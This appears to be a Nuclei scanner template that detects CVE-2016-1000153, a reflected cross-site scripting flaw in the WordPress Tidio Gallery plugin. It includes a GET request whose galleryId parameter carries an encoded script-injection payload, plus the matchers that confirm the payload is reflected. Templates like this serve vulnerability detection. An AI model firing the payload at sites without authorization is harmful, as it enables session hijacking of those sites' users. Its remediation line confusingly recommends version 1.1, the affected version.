id: CVE-2016-1000153 info: name: WordPress Tidio Gallery <=1.1 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 - https://wordpress.org/plugins/tidio-gallery classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 epss-score: 0.00101 epss-percentile: 0.41115 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: tidio-gallery_project product: tidio-gallery framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210095034260b3c397f6f1cfd351146d997b750a9ad45e9200cc7e10de36156c747b02210090ed1c2ca2e0e985fbdc0a72d3c22b4552ac5f0b5c4540c46b1f6744fa76f90e:922c64590222798bb761d5b6d8e72950